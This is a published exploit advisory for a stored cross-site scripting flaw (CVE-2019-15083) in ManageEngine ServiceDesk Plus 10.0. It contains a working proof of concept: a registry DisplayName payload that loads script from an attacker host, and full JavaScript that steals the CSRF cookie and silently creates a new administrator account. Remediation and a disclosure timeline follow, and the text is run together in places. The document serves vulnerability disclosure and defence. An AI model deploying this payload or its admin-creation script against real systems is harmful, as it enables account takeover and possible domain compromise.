# ExploitTitle:ManageEngineServiceDesk10.0-Cross-SiteScripting
# Date:2020-05-14
# ExploitAuthor:FelipeMolina(@felmoltor)
# VendorHomepage: https://www.manageengine.com/
# SoftwareLink: https://www.manageengine.com/products/service-desk/download.html
# Version:10.0(10000.0.0.0)
# Tested on:Windows10
# CVE:CVE-2019-15083[SPUK-2020-05/ManageEngineServiceDeskXSS in remote ITAssetsManagement]------------------------------SECURITYADVISORY:SPUK-2019-04/ManageEngineServiceDeskXSS in remote ITAssetsManagementAffectedSoftware:ManageEngineServiceDeskPlus(version 10.0, installer version 10000.0.0.0,SHA1:86EA684666CE85AF710CA9805B7FF37E3D4FD65D)Vulnerability:Cross-SiteScriptingCVE:CVE-2019-15083CVSSv3:5.9(CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N)Severity:MediumReleaseDate:2020-05-14I. Background~~~~~~~~~~~~~FromManageEngine's website:
"ServiceDeskPlus is a game changer in turning IT teams from daily fire-fighting todelivering awesome customer service. Itprovidesgreat visibility and central control in dealing withIT issues toensure that businesses suffer no downtime. For10 years and running, it has been delivering smiles tomillions of IT folks, end users, and stakeholders alike.
VersionEnterprise: help desk +ITIL+ asset + project
The complete ITIL ready ITSM suite withall features that an IT service desk needs.*Incident management
*Problem management
*Change management
*IT project management
*Service catalog
*Asset management
*CMDB"
II. Description~~~~~~~~~~~~~~~From wks administrator toManageEngineAdministrator:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Default installations of "ManageEngine ServiceDesk Plus 10.0" were found tobe vulnerable toaXSS injected by a workstation local administrator. Using the installed program names of the computer as a vector, the local administrator can execute JavaScript code on the ManageEngineServiceDesk administrator side.
On"Asset Home > Server > <workstation> > software" the administrator of ManageEngine can control what software is installed on the workstation. This table shows all the installed program names on the column "Software".Inthis field and probably in others, a remote attacker can inject malicious code in order toexecute it when the ManageEngine admnistrator visualizes thispage.
Inthiscase, the provided proof of concept creates a administrator user on ManageEngineServiceDesk.
PoC:~~~~1.Accesstothe workstation managed by ManageEnginewitha local administrator account.2.Open regedit.exe as administrator
3.Navigateto"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\<program>"4.Change the current "DisplayName"tothis value:
test</a><script src=http://<attacker_ip>/addadmin.js type="text/javascript"/><a>bla
5.On the root of <attacker_ip> web server, deploy the file "addadmin.js"withthis content:var createAdminParams="sdpcsrfparam=<TOKEN>&mode=new&loginPermitted=null&loggedUserId=4&userID=-1&divToShow=listView&firstName=Legituser+4&middleName=L&lastName=Inocent+4&fullName=Legituser+4+L+Inocent+4&ciTypeId=6&ciId=null&employeeID=666&CI_BaseElement_IMPACTID=null&ciDescription=&ciName=Legituser+4+L+Inocent+4&email=&phone=&mobile=&smsID=&cost=0.00&deptName=None&reportingToid=&reportingTo=&jobTitle=&isSDSiteAdmin=false&associatedSites=null&projectrole=null&canApproveSR=false&approveLimitValue=&provideLogin=on&sdpAPIKey=&apiKeyExpiry=&userName=legituser4&addNewLogin=true&userPwd=legituser&confirmUserPwd=legituser&userDomain=None&isAdmin=SDAdmin&assignedRoles=2&dcRole=DCAdmin&froModuleForUDF=TECH&addButton=Save";// Save the CSRF cookie into a variablevar sdpcsrfcookie;
carr = document.cookie.split(";");for(i=0;i<carr.length;i++){if(carr[i].split("=")[0].trim()=="sdpcsrfcookie"){
sdpcsrfcookie=carr[i].split("=")[1].trim();}}if(sdpcsrfcookie === undefined){
console.log("No CSRF cookie was found. Aborting the PoC :-(")}else{var ajaxreq =newXMLHttpRequest();
ajaxreq.open('POST', '/TechnicianDef.do');
ajaxreq.withCredentials =true;
ajaxreq.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml");
ajaxreq.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
console.log("Creating a new user on Manage Engine with CSRF token: "+sdpcsrfcookie);// Update the CSRF token parameter with the token present in the user cookie
params = createAdminParams.replace("<TOKEN>",sdpcsrfcookie);
console.log("posting to create a new admin user: "+params);
ajaxreq.send(params);}6.Reboot the workstation toforthe the agent toupdate the program list.7.Now, login as the administrator of ManageEngineSelfService.8.Navigateto"Asset Home > Server > <workstation> > software"9.Click on "Next" button until the software name is visualized on the table.10.Now, go to"Admin > Users > Technicians" and verify that the administrator user "legituser4 " has been created.
III. Impact~~~~~~~~~~~TheXSS can be injected remotely from any workstation that is being managed by ManageEngineServiceDeskwithno need for the attacker toaccess the web application. ThisPoC shows the creation of an administrator of ManageEngine, but it can be potentially used tocreateDomainAdmin users if the service is configured properly, therefore, compromising the whole domain where the workstation is in.CVSS3.0Score:
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:NIV. Remediation~~~~~~~~~~~~~~~Sanitize all the input from the remote agents before showing the values in the web page. Use typical XSS protection also for values that are not directly input on web formularies of the application.
V. Disclosure~~~~~~~~~~~~~ReportedBy:FelipeMolina de la Torre(Felipe(at)SensePost.com)VendorInformed:2019-04-30PatchReleaseDate:2019-04-16PublickAck. of the vuln:2020-05-13AdvisoryReleaseDate:2020-05-14---------------------------------[SPUK-2020-05/ManageEngineServiceDeskXSS in remote ITAssetsManagement]---
